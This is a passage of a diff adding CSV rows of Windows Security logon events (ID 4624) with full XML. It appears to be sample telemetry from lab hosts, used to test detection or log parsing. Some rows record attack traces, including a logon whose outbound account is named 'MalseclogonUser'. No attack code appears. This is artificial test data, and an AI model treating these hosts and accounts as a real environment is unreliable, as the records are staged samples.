+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50251</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.725408Z"">
+    </TimeCreated>
+    <EventRecordID>2988525</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""4524"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x56738f</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">B683BAFB-5884-30E1-12DA-31368F04511D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64223</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-02-16T10:37:19.637236Z"">
+    </TimeCreated>
+    <EventRecordID>2988522</EventRecordID>
+    <Correlation ActivityID=""2654C2A7-231C-0002-BAC2-54261C23D801"">
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-84104</Data>
+    <Data Name=""TargetUserName"">02694W-WIN10$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x567343</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">429CA5A3-EDFC-5657-17C3-C050C7B047F4</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.25</Data>
+    <Data Name=""IpPort"">50250</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:17.194652Z"">
+    </TimeCreated>
+    <EventRecordID>772611</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""2996"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1137987</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50107</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.870643Z"">
+    </TimeCreated>
+    <EventRecordID>772609</EventRecordID>
+    <Correlation ActivityID=""E671C39D-919D-0001-B2C3-71E69D91D601"">
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x244</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-23T16:50:16.697736Z"">
+    </TimeCreated>
+    <EventRecordID>772607</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""588"" ThreadID=""3692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x1136e95</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">50106</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:23.206182Z"">
+    </TimeCreated>
+    <EventRecordID>65971</EventRecordID>
+    <Correlation ActivityID=""E7B51CDE-BAD3-0000-481F-B5E7D3BAD401"">
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1280"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24db24</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50152</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:22.563018Z"">
+    </TimeCreated>
+    <EventRecordID>65969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-2895268558-4179327395-2773671012-1108</Data>
+    <Data Name=""TargetUserName"">EXCHANGE$</Data>
+    <Data Name=""TargetDomainName"">ICORP</Data>
+    <Data Name=""TargetLogonId"">0x24daa6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">EXCHANGE</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.111.87</Data>
+    <Data Name=""IpPort"">58128</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:16:58.787262Z"">
+    </TimeCreated>
+    <EventRecordID>65967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24c879</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">94BA67EA-8490-3C86-6DB7-DF74C9AA4449</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50151</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:23.206182Z"">
+    </TimeCreated>
+    <EventRecordID>65971</EventRecordID>
+    <Correlation ActivityID=""E7B51CDE-BAD3-0000-481F-B5E7D3BAD401"">
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1280"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24db24</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50152</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:22.563018Z"">
+    </TimeCreated>
